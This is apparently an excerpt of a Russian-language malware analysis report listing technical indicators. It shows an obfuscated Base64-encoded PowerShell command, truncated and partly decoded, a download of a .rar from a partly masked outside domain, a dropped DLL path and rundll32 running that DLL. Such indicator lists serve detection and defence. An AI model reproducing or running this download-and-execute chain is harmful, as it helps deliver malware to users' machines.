Техническая информация
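- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABpAFcAUwB6AHQAIAA9AFsAdAB5AFAARQBdACgAIgB7ADQAfQB7ADAAfQB7ADIAfQB7ADMAfQB7ADEAfQAiACAALQBmACAAJwBzAHQAZQBNAC4ASQBvAC4AJwAsACcAWQAnACwAJwBEAGkAUgBlAGMAdAAnACwAJwBPAFIAJw...
  (Примечание: -ENCOD — допустимое сокращение параметра -EncodedCommand; аргумент представляет собой Base64 от строки в кодировке UTF-16LE. Видимое начало декодируется в `$iWSzt =[tyPE]("{4}{0}{2}{3}{1}" -f 'steM.Io.','Y','DiRect','OR','` — имя типа собрано из фрагментов оператором форматирования -f, по-видимому, это System.IO.Directory; пятый фрагмент и остальная часть команды на странице обрезаны.)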
- %HOMEPATH%\e93xt11\lt00ebt\fre2rje.dll
- http://re######packersmovers.com/k5uzrb.rar
- DNS ASK re######packersmovers.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABpAFcAUwB6AHQAIAA9AFsAdAB5AFAARQBdACgAIgB7ADQAfQB7ADAAfQB7ADIAfQB7ADMAfQB7ADEAfQAiACAALQBmACAAJwBzAHQAZQBNAC4ASQBvAC4AJwAsACcAWQAnACwAJwBEAGkAUgBlAGMAdAAnACwAJwBPAFIAJw...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\E93xt11\Lt00ebt\Fre2rje.dll 0